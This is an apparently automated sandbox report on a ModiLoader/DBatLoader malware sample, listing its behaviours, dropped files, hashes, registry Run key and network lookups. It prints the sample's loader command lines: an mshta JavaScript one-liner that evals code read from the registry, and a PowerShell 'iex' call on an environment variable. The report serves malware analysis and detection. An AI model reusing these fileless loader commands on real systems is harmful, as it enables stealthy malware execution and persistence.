Analysis Overview
SHA256
70a17f882746bc26e6857b612292d72779adfcef08dbe07125f510a1f6a00767
Threat Level: Known bad
The file 7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
ModiLoader, DBatLoader
Process spawned unexpected child process
ModiLoader Second Stage
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-26 23:45
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 23:45
Reported
2024-05-26 23:48
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
ModiLoader, DBatLoader
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\mshta.exe |
ModiLoader Second Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3420 set thread context of 688 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7735c4474b9b25f5a2474f33e92cfa5a_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe hFKbVbXGFgZEbFHOcIE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
- CmdLine Args
C:\Windows\system32\mshta.exe
"C:\Windows\system32\mshta.exe" javascript:ZJGUWc1="L";FD1=new%20ActiveXObject("WScript.Shell");dSIpm2X3U="mw7Nqfn";KHQD39=FD1.RegRead("HKLM\\software\\Wow6432Node\\n5XmbnPSb\\rLiYok5b");HXRsFo5ip="xWM4O";eval(KHQD39);CBX9uPS4="KNzKZfXOUy";
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:kuccupa
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIEWL.exe
| MD5 | 71d8f6d5dc35517275bc38ebcc815f9f |
| SHA1 | cae4e8c730de5a01d30aabeb3e5cb2136090ed8d |
| SHA256 | fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b |
| SHA512 | 4826f45000ea50d9044e3ef11e83426281fbd5f3f5a25f9786c2e487b4cf26b04f6f900ca6e70440644c9d75f700a4c908ab6f398f59c65ee1bff85dfef4ce59 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hFKbVbXGFgZEbFHOcIE
| MD5 | cc1abc36dc3e6caea01502fae289e5a1 |
| SHA1 | 69acfc8145aaa55e6dc28289e70f1c5988888123 |
| SHA256 | dcd07910888e5be21e7503c76bef0da632e17e3775de349b1ab1fcbf75a3b093 |
| SHA512 | 289a39d8791799982fbcaac30a8840a804da162d1562cf5f6fa502e742174ea5257483a7c786bd8dc1571e7d48b1ed2e949800ccb76a2fbe6c4411e2a5e81af2 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RUNWSNYYcGVY
| MD5 | 9aef2abd0658a459108bdc4f659fcae2 |
| SHA1 | 4f6512429e1aac5dff5b5d3417e36eb98042d8ee |
| SHA256 | 6a718ee45df6706865c7f1f1a693bd73527d3bde029e4e8ad22fc27363c726f0 |
| SHA512 | d08c91c20a2dd7792a14985987a82dfebe3e1935ec133f97772e22da17329e32edff0067c3067f14f9acac33b1d71e58d1da96f495005f7f846b8a7362adb70e |
memory/3420-17-0x0000000003820000-0x0000000003821000-memory.dmp
memory/688-18-0x0000000000400000-0x0000000000439000-memory.dmp
memory/688-27-0x0000000000400000-0x0000000000439000-memory.dmp
memory/688-28-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-30-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-31-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-32-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-33-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-29-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-34-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/688-35-0x0000000001300000-0x00000000013D4000-memory.dmp
memory/744-37-0x0000000003080000-0x00000000030B6000-memory.dmp
memory/744-38-0x0000000005E40000-0x0000000006468000-memory.dmp
memory/744-39-0x0000000005A10000-0x0000000005A32000-memory.dmp
memory/744-40-0x0000000005BB0000-0x0000000005C16000-memory.dmp
memory/744-41-0x0000000005C20000-0x0000000005C86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4jylg5q.0aq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/744-51-0x0000000006470000-0x00000000067C4000-memory.dmp
memory/744-52-0x0000000005E20000-0x0000000005E3E000-memory.dmp
memory/744-53-0x00000000067E0000-0x000000000682C000-memory.dmp
memory/744-54-0x0000000008030000-0x00000000086AA000-memory.dmp
memory/744-55-0x0000000006CD0000-0x0000000006CEA000-memory.dmp
memory/688-57-0x0000000001300000-0x00000000013D4000-memory.dmp